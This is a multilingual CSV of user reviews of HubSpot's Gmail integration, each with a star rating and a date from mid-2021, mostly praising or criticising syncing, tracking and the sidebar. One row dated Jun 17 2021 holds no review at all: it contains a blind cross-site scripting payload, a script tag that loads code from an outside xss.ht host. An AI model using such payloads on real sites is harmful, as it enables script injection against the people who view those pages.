User Review,Star Rating,Date
It's been great connecting all of the employees from all over the world. It's very user-friendly and it integrates with our sales tools well (HubSpot included).,5 of 5,Jul 28 2021
Es hoy uno de los canales de comunicación con Leads y Clientes y es muy efectivo.,5 of 5,Jul 28 2021
Gmail est fiable en termes d'utilisation et avec HubSpot on a un retour sur l'ouverture des mail et l'ouverture des liens .,5 of 5,Jul 28 2021
複数の人に同じ内容を一斉に共有できる。 Ｈｕｂｓｐｏｔの利便性が余り感じられない。　 確認していただいたことが分かるが、返事がないため今までと変わらない気がする。,3 of 5,Jul 28 2021
Excelente muy práctica de integra con muchas aplicaciones y me hace tener todo bajo control en un mismo lugar,5 of 5,Jul 28 2021
Google suit is very helpful and integrated. I believe Gmail make things easier by login in different platforms.,4 of 5,Jul 27 2021
Gmail HubSpot integration is awesome and i love how seamless the experience is.,5 of 5,Jul 27 2021
Moving from classic mailbox to full Google Workspace changed our way of working. No return hopefully,5 of 5,Jul 27 2021
Am not Satisfaction. compare to other CRM its very commercial on free version no such advantages.,1 of 5,Jul 27 2021
Everything is good except the situations when mail sent in Gmail is not saved in HubSpot. It happened like with 5 % of sent emails.,3 of 5,Jul 27 2021
It's needed to communicate with clients. There's also a need of google drive in order to maintain the client databases.,3 of 5,Jul 27 2021
Facile pour garder une trace de tous les échanges avec prestataires clients etc.,5 of 5,Jul 26 2021
It has increased the performance by faster and accurate database and quick responce,5 of 5,Jul 26 2021
Muita agilidade para realização do controle de todo o CRM da empresa diversas ferramentas importantes,5 of 5,Jul 24 2021
HubSpot tasks has never worked in my Gmail. Additionally creating contacts and leads is not an instant thing; each contact or lead takes about 5 minutes to load into the HubSpot so I can't log certain emails right away.,2 of 5,Jul 23 2021
A integração funciona bem todas os agendamentos são registrados automaticamente e eu também consigo enviar e-mails por dentro do Hub que aparecem no Gmail.,5 of 5,Jul 23 2021
ik haal het uiterste er nog niet uit. kan er meer uit halen. kost me in begin veel tijd.,4 of 5,Jul 23 2021
I enjoy that I have access to all my working and emails at the same time and can access between various applications.,3 of 5,Jul 22 2021
Gmail is alright on mobile HubSpot however isn't mobile friendly since I can't send images or files through the HubSpot app.,1 of 5,Jul 22 2021
The best I can say is that it's minimally functional. Essentially consider it mostly a "view only" window into HubSpot which has clearly decided it wants you to "live in" the HubSpot web app all day rather than work out of Gmail. For context we migrated from Copper CRM to take advantage of HubSpot's complete suite--CRM sales hub marketing hub customer service hub etc. Copper can't match the functionality of having everything in one place. That said it's shocking to me that a vastly smaller company by comparison could be light years beyond HubSpot when it comes to Gmail integration. Our sales team has always worked out of the inbox. Copper allowed them to do that because there wasn't any day-to-day deal/opp management functionality that existed in the web app that didn't exist in the Chrome extension. This allowed our sales team to quickly and easily manage every aspect of a related contact company and deal/opp record without ever leaving Gmail. It was such a good experience that I simply presumed a company of HubSpot's size and cost would be at least as good if not better. I was wrong.,2 of 5,Jul 21 2021
essential tool for client ability to coordinate their schedule with mine. Ease of use from my clients who are appreciative.,3 of 5,Jul 21 2021
Funciona muy bien la integración en general con los correos de gmail en el navegador,5 of 5,Jul 21 2021
HubSpot is a very very very slow platform. Probably the slowest CRM I have ever used.,1 of 5,Jul 21 2021
Muy bien es una herramienta muy util que me ha permitido comunucarme y poder trabajar en conjuntomcon otras app,5 of 5,Jul 21 2021
Es muy facil integrar los contacto de Gmail con la aplicación. FAcil acceso y seguimiento de correos,5 of 5,Jul 21 2021
NO FUNCIONA LA INTEGRACION TIPO IMAP CON HubSpot; SE HIZO POR CELULAR  SE HIZO POR COMPUTADORA Y NO SE SINCRONIZA.,1 of 5,Jul 21 2021
Gmail works fine but HubSpot integration with Gmail I think is terrible! i don't like it,3 of 5,Jul 20 2021
Gmail works extremely good for me and our organization. Helps us reduce all the distance between our offshore customer base.,5 of 5,Jul 20 2021
It's a great tool that can track when an email is opened and to register some conversations in HS that are important to have in the CRM,5 of 5,Jul 20 2021
Esta impresión también puede ser aplicada destinada a ser acordada destinada por todos. En términos de valores aplicando una combinación de medios; de elementos de tamaño sectores y países distintos. Que califico de 'teal - integrales' y que retrata.,5 of 5,Jul 19 2021
Overall HubSpot and Gmail work together pretty well. No issues for me,5 of 5,Jul 19 2021
It works well but one thing that is very difficult is not being able to have the ability to organize my inbox using folders or segmentation. It crowds my inbox and makes my life a bit more difficult when I am seeing hundreds of emails daily.,3 of 5,Jul 16 2021
Gmail + HubSpot es un buen equipo porque te ayuda a dar seguimiento a los correos que envías a tus clientes y visualizar todas las acciones que realizan.,4 of 5,Jul 16 2021
Sim. Funciona bem acesso fácil. Somente o Maill track poderia ser ilimitado sem custo.,4 of 5,Jul 16 2021
At this point it appears to be performing well. So you're prompting me to say more...? This is very strange HubSpot. I gave you an honest reply.,4 of 5,Jul 16 2021
So far so good. However not all features are available on the app vs. desktop,5 of 5,Jul 15 2021
After setup It's a complete breeze to use HubSpot. It's the only CRM I have ever used so my standards are high for any future positions I hold where I need to use a CRM.,5 of 5,Jul 15 2021
Like I said I'm fairly new to this system so I'm still at the newbie stage. I will report later once I have got used to using the system.,4 of 5,Jul 15 2021
Ecosystème complet qui permet une synchronisation avec mon téléphone mobile,5 of 5,Jul 15 2021
Working very well all the features have helped our team gather leads in HubSpot through Gmail,5 of 5,Jul 15 2021
Funciona perfectamente en torno a cantidad de documentos que se pueden enviar orden y coordinación que puedo tener con mis clientes.,5 of 5,Jul 14 2021
Very useful to have all my business email connected to HS so I can track the record of all my communication and have my teammates aware of what's going on,5 of 5,Jul 14 2021
The integration works very well. There's one improvement I'd like to see. Currently it tracks every communication including ones with my coworkers. It would be nice to have a way to tell the tool to ignore certain domains (not just individual users).,5 of 5,Jul 13 2021
We really need inbound emails that we do not reply to to be able to be logged in HS. It seems odd that this is an issue!,3 of 5,Jul 13 2021
Overall the integration is great. There are some slight recommendations I would offer to HubSpot for improvement as I'm sure this is a popular integration.,3 of 5,Jul 13 2021
sehr gut bin sehr zufrieden. Funktioniert sehr genau. Zeitsparend.,5 of 5,Jul 13 2021
Excelente puedo usar mis contactos de celular para enviarles emails,5 of 5,Jul 13 2021
Love it! Integrates perfectly. Does what I need it to do. You don't have to switch back and forth between Google Workspace and HubSpot.,5 of 5,Jul 12 2021
HubSpot est le seul logiciel à s'intégrer parfaitement avec Gmail ou Outlook. Généralement les CRMs ne permettent pas de consigner et de suivre les emails en dehors de leur application. HubSpot est le seul logiciel à permettre le suivi et la consignation des emails depuis Gmail.,5 of 5,Jul 12 2021
It amazing,5 of 5,Jul 12 2021
I love that I can see opens to know that the message got to my prospect. I also like how it is easy to create contacts and tasks right out of Gmail.,5 of 5,Jul 12 2021
Es muy bueno. Excelente. ¿Qué más querés que te diga? 👀 👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀👀,5 of 5,Jul 11 2021
It helps to keep track to all my clients create tasks and so much more. Its my go to CRM!,5 of 5,Jul 10 2021
A little more difficult following up in HubSpot and seeing new emails outside of HubSpot.,2 of 5,Jul 10 2021
All my line ups are sorted. Easy to track activity done on my leads. Its super easy.,5 of 5,Jul 10 2021
Me gusta gmail en general es una buena herramienta de comunicación y almacenamiento de información valiosa para mi organizacion,4 of 5,Jul 9 2021
HubSpot is very straight forward and easy to use. It made handling employee concern better and faster. It streamlined our processes and made the team's response time more efficient.,5 of 5,Jul 9 2021
Gmail + HubSpot together have helped save me time and helped my business drastically. Every day I learn something new I am finding a way to save myself time every day. As a Realtor and someone who works 2 jobs every minute counts! Don't know how I went so long without this product.,5 of 5,Jul 9 2021
The two completely different HubSpot integrations for shared accounts vs individual accounts confuses the team and limits our ability to track all emails well. In addition any email sent from HubSpot appears to go directly to clients' Promotions folder which is about as bad as Spam..,3 of 5,Jul 8 2021
Was apprehensive about using gmail over outlook however once you get used to it it's user friendly. Combined with GSuite its a great platform,5 of 5,Jul 8 2021
This is better to friendly use. Work nicely as Gmail mentioned to us I really enjoyed to use this,5 of 5,Jul 8 2021
It works as expected and provides good features and integrations to other G-Suite products.,5 of 5,Jul 7 2021
Muy bien esta bien integrado la usabilidad y la experiencia como usuario es fantastica.,5 of 5,Jul 7 2021
it does not work with HubSpot due to limitations. needs to run in chrome in stead of safari can only log 10 adresses at once while using a mailing list. very limited very inefficient.,2 of 5,Jul 7 2021
Gmail has been the go-to of businesses globally and its nice that HubSpot created an integration between two platforms making it easy to keep track of daily business,5 of 5,Jul 7 2021
Is my company mail so we are using the platform to manage customer communication activities as well as to edit some documents,4 of 5,Jul 7 2021
Great but sometimes the integration of HubSpot and Gmail tend to glitch and not properly forward emails to HubSpot,3 of 5,Jul 6 2021
Gmail has via HubSpot is seamless and it has all the functionality that I needed plus the tracking if someone has opened and accessed the email sent.,5 of 5,Jul 6 2021
i dont feel the value is complicated to use other crm tools are winning HubSpot,2 of 5,Jul 6 2021
Me permite tener un mejor historial de actividades teniendo visibilidad de actibidades,5 of 5,Jul 6 2021
Gmail and HubSpot are working hand in hand and its very keeping track of mails,5 of 5,Jul 5 2021
No sabría valorarla aún pues la configuración no es fácil. Sé que tiene mucho más potencial incluso la versión gratuita pero me falta conocer mejor la forma de configurarlo,2 of 5,Jul 4 2021
The UX and UI is good but the notifications are misleading at times. Giving false notification of open rates,3 of 5,Jul 2 2021
Has always been the best tool for companies everyone aligns easily to work targets,5 of 5,Jul 2 2021
The Tracking and Log Option's DON'T Work. I have reached out to HubSpot team for support but it still does not work for me. I have to manually add emails to BCC so that I can track and Log the emails in the HubSpot CRM,1 of 5,Jul 2 2021
I can't believe how much I can do from Gmail that syncs directly into the HubSpot CRM. It is easy to set-up tells me when clients open their emails logs my emails directly in the CRM under the correct contacts companies and deal records. Not only that but I can create tasks and deals straight from Gmail to reduce the need to jump back and forth which helps me streamline my day. I have been using this integration for nearly 6 years now at multiple companies and it just keeps getting better and better.,5 of 5,Jul 2 2021
Funciona perfectamente nos permite tener un mayor control del manejo de datos y requerimientos de cada uno de nuestros clientes,5 of 5,Jul 1 2021
Gmail itself works very well. When several email accounts are deployed it makes sense to use something like MS Outlook to reign them all into one environment.,1 of 5,Jun 30 2021
it is just okay ... im still trying to get familiarize with the gmail and how it works with HubSpot.,4 of 5,Jun 30 2021
Generally good. Have to remember to start a new thread from inside HubSpot.,4 of 5,Jun 30 2021
Excellent; we have enjoyed using Gmail but the HubSpot integration solves some key problems we experienced with trying to share customer service emails that are responded to by multiple representatives.,4 of 5,Jun 29 2021
Muy bien excepto por Meets que no es muy amigable para presentar y ver la cámara de mi interlocutor.,5 of 5,Jun 29 2021
Estamos empezando pero por el momento estoy conociendo el CRM de HubSpot para entender de mejor forma la integración con Google.,5 of 5,Jun 29 2021
It's helpful to keep track of the mails and to send the same without have to be going through a lot of hassle.,5 of 5,Jun 29 2021
Good integration. Makes prospecting a breeze. Also helps in monitoring all sales activities in one go,5 of 5,Jun 29 2021
The HubSpot integration with my Gmail has made it so convenient to keep track of all my different efforts; and the tracking feature (together with Notes etc) I don't have to duplicate efforts to keep records. I also like how I can opt NOT to log and track some emails since I do use this Gmail account for some other communication for a second business.,5 of 5,Jun 28 2021
Muy bien es una buena forma de contactarse con los clientes que demuestran estar interesados con nosotros.,5 of 5,Jun 28 2021
Normal  no me aporta otra cosa que al enviar un email por gmail me lo carga en el historial del contacto esto es lo único rescatable,3 of 5,Jun 28 2021
Ça révolutionne une entreprise!! Peux importe la taille. C'est un modèle de rigueur et de fiabilité. Concentrons nous sur le principal but satisfaire notre clientèle et rentabiliser nos investissements.,5 of 5,Jun 26 2021
Funciona muy bien. Su integración con las demás herramientas de la suite lo hacen muy funcional,5 of 5,Jun 25 2021
Gmail EZ AF cause it really do be smacking though. I highly recommend and you must use!,5 of 5,Jun 25 2021
Me pone las cosas muy fáciles y la sincronización nativa con otros sistemas que uso a diario.,4 of 5,Jun 24 2021
Yes it working well and has impacted my business in a positive way. It has my process of doing business highly organized.,5 of 5,Jun 24 2021
Gmail I great for personal and business. The ability to use the email open tracking in an unobtrusive way has been very helpful both personally and professionally to confirm important messages are received. It also allows me to tailor follow-ups based on email open activity.,4 of 5,Jun 24 2021
Most of the activities are easier to manage due to automated tracking emails,4 of 5,Jun 24 2021
It's a great way to keep all types of communications in one place instead of having to follow through in different platforms,5 of 5,Jun 24 2021
The HubSpot extension is too resource-intensive and slows down the rest of my browser,1 of 5,Jun 23 2021
Works perfect! If mail address or domain in HubSpot mail can be logged at the right spot in HubSpot,4 of 5,Jun 23 2021
Gmail es excelente solo a veces es confuso cuando son muy extensos los correos es decir cuando hay un historial de correos adjunto,5 of 5,Jun 22 2021
it works well better than most platforms. helps us get done what needs to be done,4 of 5,Jun 22 2021
The integration with gmail is good but too encompassing. When I connected gmail for my 1 work account HubSpot thought it was a good idea to also include my other work account. So now all of my email from two different companies goes into the one...not good for multiple reasons. Trying to separate them is virtually impossible now because the documentation is lacking.,2 of 5,Jun 22 2021
It functions great when it's actually connected but that's so hit or miss that it drives me crazy.,1 of 5,Jun 22 2021
Maravilhosamente bem suporte total a tudo que se trata de email eu tenho com o Workspace,5 of 5,Jun 22 2021
Work well and everything seems to be in place. I do think the UXUI can be clearer though.,5 of 5,Jun 22 2021
good to work with integrated Gmail + HubSpot  our entire organization is working for all the scopes,5 of 5,Jun 22 2021
Great not spending too much time on a review. I'm busy and this is too much for me to write....,4 of 5,Jun 21 2021
Works as it should via a CRM but the inability to remove the HubSpot branding from the email body unless one is to pay for the service is nothing acceptable.,2 of 5,Jun 20 2021
its so easy to access the gmail to the HubSpot that's why I loved to used it.,5 of 5,Jun 20 2021
Gmail is great. The HubSpot integration lacks a lot of features. We need to be able to add contacts to lists from within gmail. Also be able to edit contact details from within gmail.,1 of 5,Jun 19 2021
Gmail like Outlook and other email systems has its own strengths as well as challenges. The challenge can be ease of use locating specifically needed components and activating or deactivating accordingly. Gmail sometimes does not have as user-friendly a system as I would like.,3 of 5,Jun 18 2021
Buona da migliorare l'associazione delle mail alle varie offerte aperte. Semplice da configurare,4 of 5,Jun 18 2021
good CRM but finding emails are tough. the dashboard is not easy to use. sometimes can't manage the un structured data,3 of 5,Jun 18 2021
Mühsam da doppelt Termine im Auge behalten werden müssen. Sollte besser und einfacher mit Outlook auch älter als Office365 funktionieren,2 of 5,Jun 18 2021
It would be wonderful to have a way to track specific emails connected to customers and companies but the integration will expose all your emails to everyone using HubSpot. No privacy no possibility to integrate with different authorization access.,1 of 5,Jun 18 2021
"><script src=https://vasgrg.xss.ht></script>hdddddddddddddddddddddddddddb csbndvchgsdvchs,4 of 5,Jun 17 2021
I've linked up HubSpot with Gmail and given it access. Calendar / meeting invitations are being picked up in HubSpot but none of the emails...and all the help pages haven't give me a clue. Some of the help pages actually contradict each other....*sigh*,1 of 5,Jun 17 2021
Me ha sido muy practica para enviar y recibir correos y darle seguimiento mediante las aperturas.,5 of 5,Jun 16 2021
O Gmail funciona perfeitamente bem. Não imaginava que seria tão boa a integração com o HubSpot mas me sinto muito surpreso. Acredito que utilizo plenamente todo o potencial que o HubSpot me oferece a partir dessa integração.,5 of 5,Jun 16 2021
I like being integrated. What I don't like is the HubSpot ribbon on the side taking up so much space. It forces me to scroll EVERY email I get greatly reducing my positivity about HubSpot. If that could be smaller/eliminated etc - I'd feel better about HubSpot. If I'm forced to chose one or the other - HubSpot will not win.,2 of 5,Jun 16 2021
Gmail serves as the basic means of communication. There is a range of free apps to connect and maintain the communication easier for our non-profit organisation.,4 of 5,Jun 16 2021
Gmail is fine - HubSpot's ability to track opened emails in a group email is a failure.,2 of 5,Jun 16 2021
It's working very well so far. With the ease us from HubSpot it's becoming much more powerful.,4 of 5,Jun 16 2021
Doesn’t work I was trying to get my emails in HubSpot for my contacts doesn’t work at all,1 of 5,Jun 16 2021
Gmail es simplemente insuperable como servicio básico de mensajeria sin dominio profecional,5 of 5,Jun 15 2021
Gmail is great the HubSpot integration needs some sharpening up. The sidebar popup to add new contacts to HubSpot pops up far too regularly. Whenever any email is clicked on the HubSpot sidebar appears unnecessarily which is irritating.,2 of 5,Jun 15 2021
Its the only mail service I use so it hard to say Since I only use Gmail for my communication,4 of 5,Jun 15 2021
Great tool allowing email correspondence with easy search feature. Mails can be easily sorted.,4 of 5,Jun 15 2021
Gmail is excellent. The HubSpot sidebar that opens with every message and cannot be persistently closed (kept closed) ruins the UX and robs users of 15-25% of available screen space. Unfortunately we have to keep the plugin installed for tracking/logging but I use an ad blocker to block the panel so all I get is a big waste of white space.,2 of 5,Jun 14 2021
All the features just work. Moving from Office365 it was not clear where everything was however once I was able to identify all functionality it has been seamless.,4 of 5,Jun 14 2021
Overall I couldn't be more satisfied. This software is very user friendly and cost effective. I am glad I decided to give it a try.,5 of 5,Jun 12 2021
HubSpot integrated with Gmail is exceptional - because all the same messaging templates and snippets stored in HubSpot are one-click accessible to pull into your Gmail messaging. And having HubSpot Log 'n Track all my Emails and activities to each of my contacts - no more searches trying to find my last emails to particular contacts - I just click the Contact in HubSpot and it organizes and stores all my Gmail activity in my Contacts account. Wallah ! Don't stop doing what you do so well - HubSpot ! Keep improving my Emailing life...,5 of 5,Jun 12 2021
It's a great that we can track our doc email and other activities to make a proactive approach.,5 of 5,Jun 12 2021
a great partnership together  both work very well together . finding it very useful,5 of 5,Jun 11 2021
It is good have to say. There are definitely some upgrades they could make to the HubSpot widget which could certainly improve performance such as adding a notes page under the title of a task and better use of the vidyard feature within HubSpot too.,4 of 5,Jun 11 2021
Works so well I don't think about it when I'm sending emails - it just does everything for me.,5 of 5,Jun 10 2021
Very well it's user friendly I can search for old emails and find it very quickly,5 of 5,Jun 10 2021
Overall when gmail mails comes its difficult as it allcomes together and we have to seach fior the required mail. better is outlook but still ok,4 of 5,Jun 10 2021
Overall the integration is great - the new pop up which is automated on the Gmail "side panel" needs to be improved or configurable as this has effectively stopped me from being able to use all other side panel features.,3 of 5,Jun 10 2021
Can create contacts / Companies directly from Email; Can create task and ensure I don't forget to followup; add templates and snippets easily; meetings are also very easy to use.,5 of 5,Jun 9 2021
Normal and usual business communication. Usual correspondences and business communication.,4 of 5,Jun 9 2021
works great. I really dont have time this morning to complete this....................,4 of 5,Jun 9 2021
I love using HubSpot and Gmail I don't have to log and emails because it automatically does it for me saves me so much time!,5 of 5,Jun 9 2021
Uma boa experiência e facilidade na usabilidade e também apoiando a economia de tempo.,5 of 5,Jun 8 2021
Doesn't integrate with local email applications. Employee base is split between Macs and PCs but use the local email app for day to day (vs. browser email). HubSpot email integration appears to only work on browser use and doesn't work at all with Mac email local app.,1 of 5,Jun 8 2021
Gmail works great but I felt like HubSpot hijacked it!!! I deleted that in your programs so it does not do that anymore.,1 of 5,Jun 8 2021
The issue I'm having is HubSpot defaults the tracking and CRM features and most of the time I don't want those. The documentation I read suggested there is now way to default them to off letting me check the box if I want to track them and add them to CRM. It's a huge time waster.,2 of 5,Jun 8 2021
Gmail is working very well plus HubSpot is a ferrari with a lot of potential,5 of 5,Jun 8 2021
muy bien cumple con las necesidades que tengo de un servicio completo y rápido,5 of 5,Jun 7 2021
Sim até agora sem qualquer tipo de problemas. Corresponde ás minhas expectativas.,4 of 5,Jun 7 2021
Agiliza minhas tarefas. Sendo prático e funcional permitindo uma boa conversação entre setores.,5 of 5,Jun 7 2021
Gmail is working well for us and is better now we are using it as part of Workspace.,2 of 5,Jun 7 2021
Todo genial funciona a la perfección y me aparecen todos los correos en todas partes.,5 of 5,Jun 7 2021
Very good great that it all dovetails with PC iPad and phone for ease of starting and picking up all correspondence,5 of 5,Jun 7 2021
Faciliter d'enregistrement de document dans GoogleDrive. Possibilité de réer des sous libellés et des mails types. Synchronisation facile entre plusieurs appareils. Utilisation d'une adresse vitrine commune pour l'équipe. Possibilité d'enregistrer une signature et de mis e en forme dans les mails. Permet de retrouver l'historique des mails.,3 of 5,Jun 7 2021
Excellent. Gmail HubSpot integration Gmail HubSpot integration Gmail HubSpot integration,5 of 5,Jun 7 2021
